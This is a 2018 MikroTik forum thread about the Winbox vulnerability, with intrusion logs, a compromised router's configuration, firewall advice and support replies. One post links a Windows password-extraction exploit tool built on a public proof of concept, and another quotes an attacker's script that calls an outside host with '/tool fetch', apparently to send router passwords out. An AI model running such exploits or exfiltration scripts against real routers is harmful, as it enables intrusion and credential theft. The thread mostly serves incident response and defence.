Community discussions

 
User avatar
mrz
MikroTik Support
MikroTik Support
Posts: 5659
Joined: Wed Feb 07, 2007 12:45 pm
Location: Latvia
Contact:

Re: Winbox vulnerability: please upgrade

Thu Sep 06, 2018 3:18 pm

unless they have a time machine (and you guys don't, right?).
We are working on it.
 
mkx
Long time Member
Long time Member
Posts: 643
Joined: Thu Mar 03, 2016 10:23 pm

Re: Winbox vulnerability: please upgrade

Thu Sep 06, 2018 4:27 pm

6 year old default firewall rules aren't secure enough? What do you expect MikroTik to do about that now?
MikroTik already updated the default firewall rules more than a year ago.
They can't change how they made stuff 6 years ago unless they have a time machine (and you guys don't, right?).

If you want the newer default firewall rules, you just take a spare router, upgrade it to the latest RouterOS version, reset the configuration to default, and then you just copy the firewall rules from it onto your older routers.
You can also reset your router to the newer default configuration and then build a new configuration up around that.
Or even better, read the manual about how to secure your router: https://wiki.mikrotik.com/wiki/Manual:S ... our_Router
@Deantwo: you largely misinterpreted what I wrote in my post.

The biggest problem about recently (well, in the last two years or so) vulnerabilities in ROS is that old default settings did not rigorously close all WAN access to RB. And then most of users (apart from small number of professionals and not even all professionals) don't upgrade ROS regularly. And even if they do, they expect that this is enough, but now we know that old FW rules are not good enough. Vast majority of users (quite a few "professionals" included) are too ignorant to grasp the need for constant improving of their setup (don't fix it if it ain't broken). Most home users don't have spare RB (of the exactly the same type to make the transition bearable) so that they can reset config, configure from scratch and put in production.

It just doesn't work for crowd, the same crowd that will probably never upgrade ROS anyway and because of the same crowd articles about masively compromised routerboards will pop-up in the press for quite some future ...
BR,
Metod
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 23452
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Thu Sep 06, 2018 4:47 pm

ROS is that old default settings
That is not correct. Since beginning of default firewall, it protects the default wan port. The issue is that some people want to make VPN in their home router, so they turn off the firewall.
No answer to your question? How to write posts
 
sid5632
Member Candidate
Member Candidate
Posts: 252
Joined: Fri Feb 17, 2017 6:05 pm

Re: Winbox vulnerability: please upgrade

Thu Sep 06, 2018 4:49 pm

unless they have a time machine (and you guys don't, right?).
We are working on it.
Yeah, but when will it be released?
1985?
 
User avatar
mrz
MikroTik Support
MikroTik Support
Posts: 5659
Joined: Wed Feb 07, 2007 12:45 pm
Location: Latvia
Contact:

Re: Winbox vulnerability: please upgrade

Thu Sep 06, 2018 4:50 pm

Actually old firewall protected router just fine. Users ef-ed up configuration and did not adjust firewall accordingly.
Of course we will think about improvements, but there will always be the case when somebody change something and complain that router is not secure.
 
User avatar
Deantwo
Member Candidate
Member Candidate
Posts: 236
Joined: Tue Sep 30, 2014 4:07 pm

Re: Winbox vulnerability: please upgrade

Thu Sep 06, 2018 6:08 pm

Actually old firewall protected router just fine. Users ef-ed up configuration and did not adjust firewall accordingly.
Of course we will think about improvements, but there will always be the case when somebody change something and complain that router is not secure.
Yeah, if a guide starts by saying "remove the default configuration", you likely need to rethink your choice of configuration guide.

The manual's guide on securing your router taught me a thing or two as well. Very useful.
See: https://wiki.mikrotik.com/wiki/Manual:S ... our_Router
I wish my FTP was FTL.
 
schadom
Frequent Visitor
Frequent Visitor
Posts: 69
Joined: Sun Jun 25, 2017 2:47 am
Location: Austria

Re: Winbox vulnerability: please upgrade

Fri Sep 07, 2018 1:37 am

Actually old firewall protected router just fine. Users ef-ed up configuration and did not adjust firewall accordingly.
Of course we will think about improvements, but there will always be the case when somebody change something and complain that router is not secure.

Thanks mrz for all your efforts in making the web more secure.
Here are some suggestions in unsorted order:

- Secure hashing of passwords in .idx files (scrypt, bcrypt, pbkdf2 or at least sha-3)
- Password complexity requirements setting which is enabled and enforced by default
- Warning messages and double-confirmations for enabling access from 0.0.0.0/0
- Bruteforce prevention & temporary lockout for all management ports by default
- Notifications in Winbox or on Winbox startup for criticial security updates
- A security announcement mailinglist would be very useful
- Automatic security updates (manual opt-in for SoHo devices)
 
User avatar
macgaiver
Forum Guru
Forum Guru
Posts: 1677
Joined: Wed May 18, 2005 5:57 pm
Location: Sol III, Sol system, Sector 001, Alpha Quadrant

Re: Winbox vulnerability: please upgrade

Fri Sep 07, 2018 8:41 am

I just recently remembered that i gave MT router to my far relatives, i pre-configured it with just winbox access, it was year ago, just got IP to connect to and this is what i see:
Jul/28/2018 08:12:46 system,info,account user macgaiver logged in from 95.154.216.151 via winbox
Jul/28/2018 08:12:46 system,info socks config changed by macgaiver
Jul/28/2018 08:12:47 system,info new script added by macgaiver
Jul/28/2018 08:12:48 system,info new script scheduled by macgaiver
Jul/28/2018 08:12:48 system,info new script added by macgaiver
Jul/28/2018 08:12:48 system,info new script scheduled by macgaiver
Jul/28/2018 08:12:48 system,info new script added by macgaiver
Jul/28/2018 08:12:48 system,info new script scheduled by macgaiver
Jul/28/2018 08:12:48 system,info,account user macgaiver logged out from 95.154.216.151 via winbox
Jul/28/2018 08:13:17 system,info script removed from scheduler by macgaiver
Jul/28/2018 08:13:17 system,info script removed by macgaiver
Jul/28/2018 08:13:17 system,info filter rule changed by macgaiver
Jul/28/2018 08:13:17 system,info filter rule changed by macgaiver
Jul/28/2018 08:13:17 system,info filter rule changed by macgaiver
Jul/28/2018 08:13:17 system,info script removed from scheduler by macgaiver
Jul/28/2018 08:13:17 system,info script removed by macgaiver

Aug/05/2018 11:31:15 system,info,account user macgaiver logged in from 95.154.216.151 via winbox
Aug/05/2018 11:31:16 system,info socks acl entry added by macgaiver
Aug/05/2018 11:31:16 system,info socks config changed by macgaiver
Aug/05/2018 11:31:16 system,info new script added by macgaiver
Aug/05/2018 11:31:16 system,info new script scheduled by macgaiver
Aug/05/2018 11:31:16 system,info new script added by macgaiver
Aug/05/2018 11:31:16 system,info new script scheduled by macgaiver
Aug/05/2018 11:31:16 system,info new script added by macgaiver
Aug/05/2018 11:31:16 system,info,account user macgaiver logged out from 95.154.216.151 via winbox
Aug/05/2018 11:31:16 system,info new script scheduled by macgaiver
Aug/05/2018 11:31:47 system,info script removed from scheduler by macgaiver
Aug/05/2018 11:31:47 system,info filter rule changed by macgaiver
Aug/05/2018 11:31:47 system,info script removed by macgaiver
Aug/05/2018 11:31:47 system,info script removed by macgaiver
Aug/05/2018 11:31:47 system,info filter rule changed by macgaiver
Aug/05/2018 11:31:47 system,info script removed from scheduler by macgaiver
Aug/05/2018 11:31:47 system,info filter rule changed by macgaiver
Aug/05/2018 11:31:47 system,info script removed from scheduler by macgaiver
Aug/05/2018 11:31:47 system,info script removed by macgaiver

Aug/19/2018 23:22:47 system,info,account user macgaiver logged in from 95.154.216.151 via winbox
Aug/19/2018 23:22:47 system,info socks acl entry added by macgaiver
Aug/19/2018 23:22:47 system,info socks config changed by macgaiver
Aug/19/2018 23:22:47 system,info new script added by macgaiver
Aug/19/2018 23:22:47 system,info new script scheduled by macgaiver
Aug/19/2018 23:22:47 system,info new script added by macgaiver
Aug/19/2018 23:22:47 system,info,account user macgaiver logged out from 95.154.216.151 via winbox
Aug/19/2018 23:22:47 system,info new script scheduled by macgaiver
Aug/19/2018 23:23:17 system,info script removed from scheduler by macgaiver
Aug/19/2018 23:23:17 system,info filter rule changed by macgaiver
Aug/19/2018 23:23:17 system,info script removed by macgaiver
Aug/19/2018 23:23:17 system,info filter rule changed by macgaiver
Aug/19/2018 23:23:17 system,info filter rule changed by macgaiver
Aug/19/2018 23:23:17 system,info script removed from scheduler by macgaiver
Aug/19/2018 23:23:17 system,info script removed by macgaiver

Sep/03/2018 23:03:03 system,info,account user macgaiver logged in from 109.172.76.49 via winbox
Sep/03/2018 23:03:07 system,info,account user macgaiver logged in from 109.172.76.49 via telnet
Sep/03/2018 23:03:11 system,info ip service changed by macgaiver
Sep/03/2018 23:03:13 system,info ip service changed by macgaiver
Sep/03/2018 23:03:14 system,info,account user macgaiver logged out from 109.172.76.49 via winbox
Sep/03/2018 23:03:14 system,info,account user macgaiver logged out from 109.172.76.49 via telnet
Sep/03/2018 23:03:16 system,info,account user macgaiver logged in from 159.224.52.96 via api
Sep/03/2018 23:03:20 system,info socks config changed by macgaiver
Sep/03/2018 23:03:21 system,info dns changed by macgaiver
Sep/03/2018 23:03:21 system,info item changed by macgaiver
Sep/03/2018 23:03:23 system,info script removed by macgaiver
Sep/03/2018 23:03:24 system,info script removed from scheduler by macgaiver
Sep/03/2018 23:03:25 system,info socks config changed by macgaiver
Sep/03/2018 23:03:26 system,info http proxy settings changed by macgaiver
Sep/03/2018 23:03:37 wireless,info 60:A4:D0:05:67:CB@wlan1: disconnected, disabling
Sep/03/2018 23:03:37 system,info,account user macgaiver logged out from 159.224.52.96 via api
Sep/03/2018 23:03:37 system,info,account user macgaiver logged out from 159.224.52.96 via api
Sep/03/2018 23:03:43 system,info verified routeros-mipsbe-6.42.7.npk
Sep/03/2018 23:03:43 system,info installed routeros-mipsbe-6.42.7
Sep/03/2018 23:03:44 system,info router rebooted

non of them was me :), including last one that cleared everything up and upgraded the router (thanks, to whomever that was)
With great knowledge comes great responsibility, because of ability to recognize id... incompetent people much faster.
 
msatter
Forum Veteran
Forum Veteran
Posts: 875
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Winbox vulnerability: please upgrade

Mon Sep 10, 2018 1:01 pm

Our Dutch Prime Minister has also a driver license made in Poland on his name.

Darn the advertisement is removed.
RB760iGS (hEX S) with the SFP being cooled.
Running:
RouterOS 6.43 / Winbox 3.18 / MikroTik APP 0.69
Cooling a SFP module: viewtopic.php?f=3&t=132258&p=671105#p671105
 
User avatar
BartoszP
Forum Guru
Forum Guru
Posts: 1585
Joined: Mon Jun 16, 2014 1:13 pm
Location: Poland

Re: Winbox vulnerability: please upgrade

Mon Sep 10, 2018 1:13 pm

@msatter: Is it joke or not?
Real admins use real keyboards.
 
wpeople
Member
Member
Posts: 343
Joined: Sat May 26, 2007 6:36 pm

Re: Winbox vulnerability: please upgrade

Mon Sep 10, 2018 6:47 pm

May i ask, how is it possible to attacker to load up the know scripts and modify firewall, sock proxy, etc.
if in IP/Services only winbox and ssh is allowed,but they are limited to connect from known prefixes?

It's even happened in 6.42.1 or 6.42.3
 
User avatar
43north
Member Candidate
Member Candidate
Posts: 191
Joined: Fri Nov 14, 2014 7:06 am

Re: Winbox vulnerability: please upgrade

Mon Sep 10, 2018 9:06 pm

May i ask, how is it possible to attacker to load up the know scripts and modify firewall, sock proxy, etc.
if in IP/Services only winbox and ssh is allowed,but they are limited to connect from known prefixes?

It's even happened in 6.42.1 or 6.42.3
I have understood that even if you limit the connections in the IP/Services to specific addresses that it still allows the attacker close enough to execute the exploit. I have created firewall rules for the default 8291 and also for the port that I changed my Winbox access to. This is the only sure way in my mind that they won't be able to even reach IP/Services.

Anyone please correct me if I am wrong on these points.
 
msatter
Forum Veteran
Forum Veteran
Posts: 875
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Winbox vulnerability: please upgrade

Mon Sep 10, 2018 9:11 pm

@msatter: Is it joke or not?
https://www.rdw.nl/particulier/nieuws/2 ... -rijbewijs

The internet is full of news items about Rutte rijbewijs
RB760iGS (hEX S) with the SFP being cooled.
Running:
RouterOS 6.43 / Winbox 3.18 / MikroTik APP 0.69
Cooling a SFP module: viewtopic.php?f=3&t=132258&p=671105#p671105
 
User avatar
Deantwo
Member Candidate
Member Candidate
Posts: 236
Joined: Tue Sep 30, 2014 4:07 pm

Re: Winbox vulnerability: please upgrade

Tue Sep 11, 2018 10:08 am

May i ask, how is it possible to attacker to load up the know scripts and modify firewall, sock proxy, etc.
if in IP/Services only winbox and ssh is allowed,but they are limited to connect from known prefixes?

It's even happened in 6.42.1 or 6.42.3
Without knowing exactly what you had configured on it, it is hard to know what was and wasn't possibly.
Also if you didn't change your password after upgrading, anyone that may have exploited your router before you upgraded might still have access.

I suggest you email support@mikrotik.com (see), they will be able to look through your configuration and see if it is a configuration issue or a software bug.
I wish my FTP was FTL.
 
wpeople
Member
Member
Posts: 343
Joined: Sat May 26, 2007 6:36 pm

Re: Winbox vulnerability: please upgrade

Tue Sep 11, 2018 12:08 pm

May i ask, how is it possible to attacker to load up the know scripts and modify firewall, sock proxy, etc.
if in IP/Services only winbox and ssh is allowed,but they are limited to connect from known prefixes?

It's even happened in 6.42.1 or 6.42.3
Without knowing exactly what you had configured on it, it is hard to know what was and wasn't possibly.
Also if you didn't change your password after upgrading, anyone that may have exploited your router before you upgraded might still have access.

I suggest you email support@mikrotik.com (see), they will be able to look through your configuration and see if it is a configuration issue or a software bug.
Even if he knows the password BUT the service is LIMITED to my ip prefixes, how the hell he can control my device?!
The only way is this possible, if Mikrotik made the service check connecting IP address AFTER authentication.

If the services does NOT allow connection from anybut but listed IPs, the packets from unlisted source should not access the application. I think.
Please fixme, or accept that there is another piece of sh!t found in the pancake...
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 23452
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Tue Sep 11, 2018 1:20 pm

Did you always have the IP SERVICES limitation? The hack could have happened last year. Is it correctly set up, and was it always?
No answer to your question? How to write posts
 
wpeople
Member
Member
Posts: 343
Joined: Sat May 26, 2007 6:36 pm

Re: Winbox vulnerability: please upgrade

Tue Sep 11, 2018 1:27 pm

Yes! 95% of those routers had ip/services limitation since installation! (other 5% is customer radio turned to router from bridge, due customer router issue)

90% of those 95% devices has remote syslog as well - but momentary had no time to lookup them. probably i will found something, becuase hacker set logging limit to 1 line :-)
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 23452
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Tue Sep 11, 2018 1:30 pm

How about possibility of a staff member, that used the attack script from the allowed IP range?
IP services works well, there is zero evidence that this limit can be overcome in some way.
No answer to your question? How to write posts
 
User avatar
Deantwo
Member Candidate
Member Candidate
Posts: 236
Joined: Tue Sep 30, 2014 4:07 pm

Re: Winbox vulnerability: please upgrade

Tue Sep 11, 2018 2:36 pm

May i ask, how is it possible to attacker to load up the know scripts and modify firewall, sock proxy, etc.
if in IP/Services only winbox and ssh is allowed,but they are limited to connect from known prefixes?

It's even happened in 6.42.1 or 6.42.3
Without knowing exactly what you had configured on it, it is hard to know what was and wasn't possibly.
Also if you didn't change your password after upgrading, anyone that may have exploited your router before you upgraded might still have access.

I suggest you email support@mikrotik.com (see), they will be able to look through your configuration and see if it is a configuration issue or a software bug.
Even if he knows the password BUT the service is LIMITED to my ip prefixes, how the hell he can control my device?!
The only way is this possible, if Mikrotik made the service check connecting IP address AFTER authentication.

If the services does NOT allow connection from anybut but listed IPs, the packets from unlisted source should not access the application. I think.
Please fixme, or accept that there is another piece of sh!t found in the pancake...
Check your logs to see where the attacker accessed from, it could be a compromised machine from a trusted IP-address range. We can't really help you here without more information.

Maybe better if you make a new thread and post your configuration (passwords and IPs obscured of course) so we can see what might be wrong and help you there. Instead of polluting this thread with baseless accusations and misinformation.

I would however suggest to email support@mikrotik.com, since if it is a real issue then they can escalate it to the right department. This would however not satisfy my curiosity.
I wish my FTP was FTL.
 
User avatar
macgaiver
Forum Guru
Forum Guru
Posts: 1677
Joined: Wed May 18, 2005 5:57 pm
Location: Sol III, Sol system, Sector 001, Alpha Quadrant

Re: Winbox vulnerability: please upgrade

Tue Sep 11, 2018 2:45 pm

in some cases it was reported that device got infected from other infected device from the same (trusted) network.
With great knowledge comes great responsibility, because of ability to recognize id... incompetent people much faster.
 
tiktakmik
just joined
Posts: 6
Joined: Tue Sep 11, 2018 5:57 pm

Re: Winbox vulnerability: please upgrade

Tue Sep 11, 2018 6:09 pm

CHR was hacked. I got new password from disk image and password recovery tools.
Now i change hacker's configuration, remove socks, change password again, but didn't clear disk image and license.

See screenshot of winbox interface : http://prntscr.com/kt6f9y


1 . Whis is this "job" on image? It is hacker's job, or system (like osfp)?
There is no such task in the my usual configuration

here is full export command (little obfuscated)
/export
# sep/11/2018 17:50:21 by RouterOS 6.43
# software id =
#
#
#
/interface gre
add !keepalive local-address=185.31.1.2 name=to_Sremote-address=46.0.1.1
add !keepalive local-address=185.31.1.2 name=to_X remote-address=178.215.1.1
/interface wireless security-profiles
set [ find default=yes ] supplicant-identity=MikroTik
/routing ospf instance
set [ find default=yes ] router-id=192.168.123.0
/snmp community
set [ find default=yes ] addresses=0.0.0.0/0 name=public4444
/ip address
add address=185.31.1.2/24 interface=ether1 network=185.31.1.0
add address=192.168.123.254/24 interface=ether2 network=192.168.123.0
add address=10.10.10.26/30 interface=to_Xl network=10.10.10.24
add address=20.20.20.1/30 interface=to_Y network=20.20.20.0
/ip dhcp-client
add disabled=no interface=ether1
/ip dns
set allow-remote-requests=yes servers=8.8.8.8
/ip firewall filter
add action=fasttrack-connection chain=forward connection-state=established,related
add action=accept chain=forward connection-state=established,related
add action=accept chain=input connection-state=established,related
add action=drop chain=input dst-port=53 in-interface=ether1 protocol=udp
add action=drop chain=input dst-port=53 in-interface=ether1 protocol=tcp
/ip firewall nat
add action=masquerade chain=srcnat out-interface=ether1
add action=netmap chain=dstnat comment="HTTPS Nginx" dst-port=443 in-interface=ether1 protocol=tcp to-addresses=192.168.123.1 to-ports=443
/ip firewall service-port
set ftp disabled=yes
set tftp disabled=yes
set irc disabled=yes
set h323 disabled=yes
set sip disabled=yes
set udplite disabled=yes
set dccp disabled=yes
set sctp disabled=yes
/ip route
add distance=1 gateway=185.31.1.1
/ip service
set telnet disabled=yes
set ftp disabled=yes
set www disabled=yes
set ssh port=2001
set api disabled=yes
set api-ssl disabled=yes
/routing ospf network
add area=backbone network=10.10.10.24/30
add area=backbone network=192.168.123.0/24
add area=backbone network=20.20.20.0/30
/system clock
set time-zone-name=Europe/Moscow
/system ntp client
set enabled=yes primary-ntp=216.229.0.179 secondary-ntp=80.240.216.155
Can hackers also put backdoors to linux?

2. How I can I reinstall CHR license on new disk image?
 
User avatar
Deantwo
Member Candidate
Member Candidate
Posts: 236
Joined: Tue Sep 30, 2014 4:07 pm

Re: Winbox vulnerability: please upgrade

Tue Sep 11, 2018 8:06 pm

here is full export command (little obfuscated)
/export
# sep/11/2018 17:50:21 by RouterOS 6.43
# software id =
#
#
#
/interface gre
add !keepalive local-address=185.31.1.2 name=to_Sremote-address=46.0.1.1
add !keepalive local-address=185.31.1.2 name=to_X remote-address=178.215.1.1
/interface wireless security-profiles
set [ find default=yes ] supplicant-identity=MikroTik
/routing ospf instance
set [ find default=yes ] router-id=192.168.123.0
/snmp community
set [ find default=yes ] addresses=0.0.0.0/0 name=public4444
/ip address
add address=185.31.1.2/24 interface=ether1 network=185.31.1.0
add address=192.168.123.254/24 interface=ether2 network=192.168.123.0
add address=10.10.10.26/30 interface=to_Xl network=10.10.10.24
add address=20.20.20.1/30 interface=to_Y network=20.20.20.0
/ip dhcp-client
add disabled=no interface=ether1
/ip dns
set allow-remote-requests=yes servers=8.8.8.8
/ip firewall filter
add action=fasttrack-connection chain=forward connection-state=established,related
add action=accept chain=forward connection-state=established,related
add action=accept chain=input connection-state=established,related
add action=drop chain=input dst-port=53 in-interface=ether1 protocol=udp
add action=drop chain=input dst-port=53 in-interface=ether1 protocol=tcp
/ip firewall nat
add action=masquerade chain=srcnat out-interface=ether1
add action=netmap chain=dstnat comment="HTTPS Nginx" dst-port=443 in-interface=ether1 protocol=tcp to-addresses=192.168.123.1 to-ports=443
/ip firewall service-port
set ftp disabled=yes
set tftp disabled=yes
set irc disabled=yes
set h323 disabled=yes
set sip disabled=yes
set udplite disabled=yes
set dccp disabled=yes
set sctp disabled=yes
/ip route
add distance=1 gateway=185.31.1.1
/ip service
set telnet disabled=yes
set ftp disabled=yes
set www disabled=yes
set ssh port=2001
set api disabled=yes
set api-ssl disabled=yes
/routing ospf network
add area=backbone network=10.10.10.24/30
add area=backbone network=192.168.123.0/24
add area=backbone network=20.20.20.0/30
/system clock
set time-zone-name=Europe/Moscow
/system ntp client
set enabled=yes primary-ntp=216.229.0.179 secondary-ntp=80.240.216.155
Yeah, that configuration is not secure. Wide open to the internet and attackers.
At least missing a couple block rules in the firewall filter. For example:
/ip firewall filter
add action=accept chain=forward in-interface=ether1 connection-state=established,related
add action=accept chain=input in-interface=ether1 connection-state=established,related
add action=drop chain=forward in-interface=ether1
add action=drop chain=input in-interface=ether1
But suggest you read the manual page about securing your router: https://wiki.mikrotik.com/wiki/Manual:S ... our_Router
Can hackers also put backdoors to linux?
No they can not access the linux operating system of the router, unless you have rooted the router yourself already. Which you really should not do.
Unless you were running a version of RouterOS that is older than v6.38.5, see: viewtopic.php?f=21&t=132499
2. How I can I reinstall CHR license on new disk image?
I suggest you email support@mikrotik.com with your license issue.
I wish my FTP was FTL.
 
tiktakmik
just joined
Posts: 6
Joined: Tue Sep 11, 2018 5:57 pm

Re: Winbox vulnerability: please upgrade

Tue Sep 11, 2018 10:16 pm

Yeah, that configuration is not secure. Wide open to the internet and attackers.
Yes. And this is fine. Everyone has his own vision of comfort and safety.
What about my question? who starts this job?
2. How I can I reinstall CHR license on new disk image?

I suggest you email support@mikrotik.com with your license issue.
I haven't access to email or account. Only disk image with self-updated license.
Any other suggestion?
 
User avatar
Deantwo
Member Candidate
Member Candidate
Posts: 236
Joined: Tue Sep 30, 2014 4:07 pm

Re: Winbox vulnerability: please upgrade

Tue Sep 11, 2018 11:01 pm

2. How I can I reinstall CHR license on new disk image?
I suggest you email support@mikrotik.com with your license issue.
I haven't access to email or account. Only disk image with self-updated license.
Any other suggestion?
Email support@mikrotik.com, they can help you with all your questions.
I wish my FTP was FTL.
 
djradiator
just joined
Posts: 5
Joined: Mon Mar 22, 2010 7:10 pm

Re: Winbox vulnerability: please upgrade

Tue Sep 11, 2018 11:20 pm

Hello everybody,

If somebody will need, I just created a Windows App for showing passwords for impacted MK versions based on the original Python script (https://github.com/BasuCert/WinboxPoC):
https://github.com/msterusky/WinboxExploit/releases

It's a one-time application, and don't plan any extensions and next versions.
The app doesn't contain an implementation with mac-winbox, and works only on IP layer.

Please, feel free to reuse it or adjust as you need.


Thanks,
Martin
 
sid5632
Member Candidate
Member Candidate
Posts: 252
Joined: Fri Feb 17, 2017 6:05 pm

Re: Winbox vulnerability: please upgrade

Wed Sep 12, 2018 1:37 am

Yeah, that configuration is not secure. Wide open to the internet and attackers.
Yes. And this is fine. Everyone has his own vision of comfort and safety.
You got hacked and started asking questions. Then when someone gives you a sensible answer and tells you where you went wrong, you disagree with them and stick your head in the sand.
You ARE a fool.
 
tiktakmik
just joined
Posts: 6
Joined: Tue Sep 11, 2018 5:57 pm

Re: Winbox vulnerability: please upgrade

Wed Sep 12, 2018 9:36 am


You ARE a fool.
If this is a reasonable answer, then I invite you to go to Western Siberia in the winter to restore access to the router.


Just answer me, what kind of job is running on this configuration?
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 23452
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Wed Sep 12, 2018 9:40 am

Let me understand this.

1. You have an open router with no firewall
2. You ask why somebody connected to it

Correct?
No answer to your question? How to write posts
 
User avatar
Deantwo
Member Candidate
Member Candidate
Posts: 236
Joined: Tue Sep 30, 2014 4:07 pm

Re: Winbox vulnerability: please upgrade

Wed Sep 12, 2018 10:03 am

If this is a reasonable answer, then I invite you to go to Western Siberia in the winter to restore access to the router.
Even better reason to have it secure, and a plan for how to access it remotely when you finally do secure it correctly.
The manual page I linked you to has examples on how to do all of that. I urge you to give it a read if you haven't already, but even so reading it again is a good idea. I might need to read it all again myself.
Just answer me, what kind of job is running on this configuration?
From the picture and config you supplied us, we can't tell you.
That is why I told you to email support@mikrotik.com instead. Maybe they can see what it is doing if you make a supout?

I guess that it could be an infinity looped mischievous script that wakes up every specific interval and changes the configuration somehow or sends out mischievous traffic. The log could give some hints as to what it is doing, or maybe the System->History.
But if you are running RouterOS v6.43, I don't even see how this is related to this topic at all. Change your password so people that may have hacked your router before can't access it again, and clean up any possible mischievous configuration or scripts. Then implement a more secure firewall and more secure remote access.

Either way, us sitting here and guessing doesn't help anyone. Best not to go too off-topic in this thread with assumptions and speculations. Email support@mikrotik.com and they will be able to help you more closely, or make a new thread so we can all discuss your issue better.
I wish my FTP was FTL.
 
tiktakmik
just joined
Posts: 6
Joined: Tue Sep 11, 2018 5:57 pm

Re: Winbox vulnerability: please upgrade

Wed Sep 12, 2018 10:35 am

Let me understand this.

1. You have an open router with no firewall
2. You ask why somebody connected to it

Correct?
No. Read everything from the beginning
I ask what kind of job running without any config on scheduler or watchdog.
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 23452
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Wed Sep 12, 2018 10:43 am

Sorry I don't understand that question. Try to re-phrase it.
No answer to your question? How to write posts
 
User avatar
Deantwo
Member Candidate
Member Candidate
Posts: 236
Joined: Tue Sep 30, 2014 4:07 pm

Re: Winbox vulnerability: please upgrade

Wed Sep 12, 2018 10:50 am

Sorry I don't understand that question. Try to re-phrase it.
He is talking about what he said in viewtopic.php?p=685673#p685509, a job is shown to be running, yet the configuration doesn't appear to have any scripts in it.
But as I said, from the picture and config alone, I doubt we can't tell him what it is. Unless you happen to know anything else that appear in the job list than scripts.
I wish my FTP was FTL.
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 23452
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Wed Sep 12, 2018 10:53 am

This is normal, if you open a Terminal. There is no hacker here.
No answer to your question? How to write posts
 
tiktakmik
just joined
Posts: 6
Joined: Tue Sep 11, 2018 5:57 pm

Re: Winbox vulnerability: please upgrade

Wed Sep 12, 2018 10:57 am

This is normal, if you open a Terminal. There is no hacker here.
I have another similar configuration of CHR (not previosly hacked). Before asking, I checked there and didn't see any jobs.
So I suspect a hacker backdoor.
 
tiktakmik
just joined
Posts: 6
Joined: Tue Sep 11, 2018 5:57 pm

Re: Winbox vulnerability: please upgrade

Wed Sep 12, 2018 11:01 am

This is normal, if you open a Terminal. There is no hacker here.
ok. confirm this!


now we can go on to discuss the journey in winter
 
User avatar
Deantwo
Member Candidate
Member Candidate
Posts: 236
Joined: Tue Sep 30, 2014 4:07 pm

Re: Winbox vulnerability: please upgrade

Wed Sep 12, 2018 11:13 am

This is normal, if you open a Terminal. There is no hacker here.
I feel stupid for forgetting this detail... knew I was forgetting something.
Anyway, thanks for the confirmation.
I wish my FTP was FTL.
 
wpeople
Member
Member
Posts: 343
Joined: Sat May 26, 2007 6:36 pm

Re: Winbox vulnerability: please upgrade

Thu Sep 13, 2018 7:02 pm

Just found this on a customer router (where winbox was open for world, running 6.42.3) in system/scripts

{/tool fetch url=("http://www.boss-ip.com/Core/Update.ashx ... artextpass")}
 
spacemind
Member Candidate
Member Candidate
Posts: 106
Joined: Mon Jul 07, 2008 8:33 pm

Re: Winbox vulnerability: please upgrade

Sat Sep 15, 2018 9:09 pm

....
Last edited by spacemind on Sat Sep 15, 2018 10:48 pm, edited 1 time in total.
 
User avatar
BartoszP
Forum Guru
Forum Guru
Posts: 1585
Joined: Mon Jun 16, 2014 1:13 pm
Location: Poland

Re: Winbox vulnerability: please upgrade

Sat Sep 15, 2018 10:14 pm

What do you want to say? Have you example of hacked 6.42.7 or are you just guessing and making noise?
Real admins use real keyboards.
 
spacemind
Member Candidate
Member Candidate
Posts: 106
Joined: Mon Jul 07, 2008 8:33 pm

Re: Winbox vulnerability: please upgrade

Sat Sep 15, 2018 10:29 pm

post deleted .... contacted support instead.
Last edited by spacemind on Sat Sep 15, 2018 10:47 pm, edited 1 time in total.
 
kobuki
Member Candidate
Member Candidate
Posts: 123
Joined: Sat Apr 02, 2011 5:59 pm

Re: Winbox vulnerability: please upgrade

Sat Sep 15, 2018 10:37 pm

What do you want to say? Have you example of hacked 6.42.7 or are you just guessing and making noise?
One of a client's main router with ros 6.42.7 has been compromised and a lot of traffic was beeing generated before i replace it for a new one.

Ros 6.42.7 with only winbox port open to web, and the other network routers and access points including swos switches are all compromised except the ones with ros 6.18.

This crazy security holes....
I'm not advocating for Mikrotik but please stop this. It's very annoying and I'm really not sure if you're just trolling, speaking on behalf of a competitor or you have a genuine case of hacking. Tell us all details, like how you've checked there were no default empty or easy to guess passwords, proxy service or firewall rules enabled that make it easy to use the router as a starting point for hackers, etc. If you're not 100% positive the break-in is a result of a new security hole then you should consider removing your post and rethink what you post here. We're all here to share info on all the existing exploits and how to deal with them. If you happen to find a genuine one, make a support request with a supout file and file a support request instead.
 
spacemind
Member Candidate
Member Candidate
Posts: 106
Joined: Mon Jul 07, 2008 8:33 pm

Re: Winbox vulnerability: please upgrade

Sat Sep 15, 2018 11:01 pm

kobuki i'm using Mikrotik since version 2, i watched the huge improvement in Mikrotik hardware. I have thousands of deployed mikrotik networks since 2001.

thank you for your sugestion but i'm getting a bit tired of this magnific hardware with crazy and buggy software.

I replaced a few hacked routers and will investigate whats happened.

Bye :)
R.
 
zvekyf
just joined
Posts: 8
Joined: Thu Sep 29, 2016 1:29 am

Re: Winbox vulnerability: please upgrade

Sun Sep 16, 2018 9:18 pm

is there maybe a plan to add auto update option and set that as default option?
There are many routers which will never be updated or until something real bad happens.

Also maybe to add option to auto update only security fixes.

This way every router will be immediately patched/updated(unmanaged) and IT folks(managed) can select manual updates but set auto update for security fixes.
 
User avatar
Deantwo
Member Candidate
Member Candidate
Posts: 236
Joined: Tue Sep 30, 2014 4:07 pm

Re: Winbox vulnerability: please upgrade

Mon Sep 17, 2018 10:51 am

is there maybe a plan to add auto update option and set that as default option?
